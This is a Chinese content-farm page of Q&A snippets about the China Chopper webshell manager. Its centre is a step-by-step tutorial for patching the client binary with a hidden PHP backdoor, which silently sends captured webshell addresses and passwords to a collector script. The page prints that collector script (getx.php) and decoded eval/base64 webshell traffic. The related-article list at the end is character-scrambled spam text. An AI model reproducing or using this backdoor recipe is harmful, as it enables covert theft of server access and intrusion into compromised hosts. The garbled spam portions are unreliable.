当前位置:首页 > 情感技巧 > 正文内容

黑客中国莱刀(菜刀 黑客)

hacker3年前 (2022-07-25)情感技巧120

本文目录一览:

为什么我的中国菜刀链接我自己的服务器,无法执行cmd显示执行命令失败,对方启动安全模式

您好,电脑基础专业芝麻团队奶沫为您解答!(望采纳,谢谢)

中国菜刀是黑客用的吧?

中国黑客界的东南西北中都是有谁?

这个不知道,桂林老兵,冰狐浪子,葛军,NEW4等等,至于是不是你说的东南西北中,你查一下他们的位置就知道了,我估计桂林老兵大概是西吧,他最新的作品:中国菜刀,相当强悍

黑客菜刀是什么意思

从软件名字上来讲有这个软件属于黑客工具,用于管理拿下的webshell批量管理。

如果是菜刀的话可以在社工的时候拿菜刀威胁恐吓对方也属于忽悠的一种,也是属于黑客

很高兴为逗逼解答。如果你满意的话麻烦采纳!

如何给中国菜刀添加隐蔽后门

1、后门如何触发

这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。

当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图

当我们执行右键-编辑文件时,我们的后门就会被触发(我们要添加的就是这样的一个隐藏后门)。

2、菜刀脱壳

在分析菜刀前,先把菜刀的壳脱掉,使用Peid可知,菜刀是UPx壳,网上找个Upx的脱壳工具即可脱壳。

3、查看数据包,分析流程(右键-编辑)

本地搭建好环境后,在菜刀中右键-编辑查看某一文件,使用burpsuite进行抓包,

数据如下

a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3Bz0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3Dz1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D

一共有3个参数,

a url解码后为@eval (base64_decode($_POST[z0]));

z0先url解码,在base64解码为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|-");die();

Z1先url解码,在base64解码为

C:\\wamp\\www\\robots.txt

稍微熟悉php的人应该能看出来,这段代码就是一个读文件的php脚本,由菜刀发送到目标服务器上,然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

如果我们将上这段代码作为字符串,发送到服务端执行,我们就能获得webshell的地址和密码。

4、使用OD分析

使用OD打开中国菜刀,右键搜索字符串,结果如下:

定位到php读取文的字符串处,点击进去到代码处

可知,程序时将其作为字符串,压入栈中作为参数被后续函数处理的,如果在这段字符串后加入我们的后门代码,就会被程序一块发送到服务端执行。

5、修改菜刀程序文件

由上可知,字符串的地址为0x49ba94,查看内存数据,

发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。

这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。

将后门字符串

$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

放到文件841d0处

打开010editor 将上述字符串复制到010editor中,

由于程序中的字符串是双字节存放的,这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换

使用010editor打开菜刀程序,跳到841d0h偏移处,将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度,

保存文件,这样后门字符串就被我们添加到程序中了。

6、使用OD修改程序代码

用OD打开菜刀程序,定位到第4步中字符串入栈的代码处 push 0049bae4。

0049bae4地址是修改前字符串的位置,现在我们将其改成我们添加的字符串的地质处,字符串文件偏移为841d0h,转化内存偏移为4841d0h,代码修改如下

保存修改的文件即可。

7、测试修改结果

修改文件后,我们在看看菜刀-右键编辑,抓到数据包

Z0解密后为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|-");die();

可见我们的后门代码也一起被发送到服务端执行了。

编写加单的getx.php接收结果,

getx.php:

?php

$getx = $_GET["caidao"];

$file = fopen("getx.txt","a+");

fwrite($file,$getx);

fwrite($file,"\r\n");

fclose($file);

?

结果如下:

8、后记

通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到后门的;OD中右键查看后门地址也是不能直接看到的。

使用中国菜刀怎么运行服务端的代码

服务端只需要简单的一行代码.这绝对可以排入叉叉最喜欢的十大软件排行榜。(Ps:在某些黑阔手中菜刀算得上是居家旅行,杀人越货的必备神器),究竟

黑客常用哪些工具

使用工具的一直都是脚本工具,还有楼下说的那些已经过期了,什么鬼讲的。。。醉了。

我怕中国红客的万鹰控制不住的想去找你谈论下什么叫黑客工具:

常见的:啊D,明小子,sqlmap,3389,菜刀,webshell马儿,等等!

扫描二维码推送至手机访问。

版权声明:本文由万物知识分享发布,如需转载请注明出处。

本文链接:https://www.qmsspa.com/77009.html

分享给朋友:

“黑客中国莱刀(菜刀 黑客)” 的相关文章

免费去除无痕水印(短视频去水印详解)

免费去除无痕水印(短视频去水印详解)

平日 ,当人们正在Tik Tok、Aauto Quicker等仄台上刷望频时,每每 会高载一点儿粗彩的内容取同伙 分享。并且 相比珍藏 保留 ,高载到当地 不雅 看更便利 ,没有会掉 效。然则 假如 您间接高载,望频会有火印。网下水印的对象 战小法式 许多 ,有的须要 少空儿看告白 ,有的间接...

百度智能小程序优化关键词有哪些方法?

百度智能小程序优化关键词有哪些方法?

baidu智能小法式 劣化症结 词的要领 有哪些?baidu小法式 若何 猎取流质?baidu小法式 若何 劣化排名?那些答题皆是搜索引擎优化 er面对 的易题,也是宽大 外小企业主最关怀 的答题。上面分享一点儿baidu智能小法式 症结 词劣化的履历 。baidu智能小法式 劣化症结 词其真很单...

主播雪梨和林珊珊偷逃税被处罚(央媒评主播雪梨林珊珊偷逃税)

#收集 主播悉僧战林珊珊果偷税漏税被奖#,却出念到赔了那么多钱!宋暂暂表现 ,依据 外华群众共战国国度 税务总局杭州市税务局疑息,收集 主播#墨鲜晖#(微专ID:悉僧)战#林珊珊#(微专ID:林珊珊_Sunny)果偷税漏税将分离 被 请求逃纳税款、滞缴金、奖款 六 五 五 五. 三 一万元战 二 ...

从零开始做自媒体什么项目好交流(新人做自媒体要注意哪些)

[本创]否以看到,不管您是挨工人照样 通俗 人,皆否以成为收集 仄台上的亮星,被北南圆的人所生知。然则 他们是怎么作到的呢?年夜 野皆 晓得成名没有是一挥而就 的。现在 有了自媒体,许多 人皆否以经由过程 自媒体真现成名成名的妄想 。然则 做为新人应该怎么作能力 作孬自媒体呢?(文字/宋九暂)...

iphone 11 pro max与iphone 12pro(iphone 12 promax 11 promax)

iPhone  一三、iPhone  一 三 Pro战iPhone  一 三 Pro Max的最好案例 那款iPhone  一 三。取其说是完全 的iPhone  一 二从新 设计,没有如说更像是一次革新 ,但说到iPhone中壳,纵然 是很小的设计差别 ,也否能象征着上一代其实不...

如何解决百度索引量不稳定的问题(百度索引量和收录量)

baidu指数数目 战支录数目 是包括 的。咱们以为 内露质是现场指令查询的成果 数,但那个数自己 是现实 指标质的估量 值。是以 ,包括 质仅仅指标质的一部门 。 起先 ,咱们正在SEO外有一个包括 的观点 ,但之后baidu起首 引进了索引数目 的观点 。从此,咱们开端 存眷 baidu的...

评论列表

蓝殇卿绡
3年前 (2022-07-25)

后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。将后门字符串$F

世味痞唇
3年前 (2022-07-25)

作品:中国菜刀,相当强悍黑客菜刀是什么意思从软件名字上来讲有这个软件属于黑客工具,用于管理拿下的webshell批量管理。如果是菜刀的话可以在社工的时候拿菜刀威胁恐吓对方也属于忽悠的一种,也是属于黑客很高兴为逗逼解答。如果你满意的话麻烦采纳!如何给中国菜刀添加隐蔽后门1、后门如何触发这里要先讲

颜于闻枯
3年前 (2022-07-25)

老兵大概是西吧,他最新的作品:中国菜刀,相当强悍黑客菜刀是什么意思从软件名字上来讲有这个软件属于黑客工具,用于管理拿下的webshell批量管理。如果是菜刀的话可以在社工的时候拿菜刀威胁恐吓对方也属于忽悠的一种,也是属于黑客很高兴为逗逼解答。如果你满意的话麻烦采纳!如何给中国菜刀添

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。